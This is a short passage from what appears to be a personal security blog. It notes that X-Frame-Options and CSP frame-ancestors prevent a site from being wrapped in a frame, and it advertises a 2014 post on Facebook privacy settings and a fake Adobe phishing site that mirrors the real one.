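A site that sends `X-Frame-Options` or a CSP `frame-ancestors` directive cannot be wrapped this way in browsers that enforce them, so the check matters most for brands whose pages still allow framing.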
**Knowledge sharing: shut out malicious behavior by strengthening your Facebook privacy settings, so you are no longer tagged by annoying shopping groups! Plus important information: beware of a fake Adobe malicious site that looks 100% like the real one and stays in sync with it! Security advisory 2014-02-27**
===Sincerely === THE END === Melody.Blogger~===>/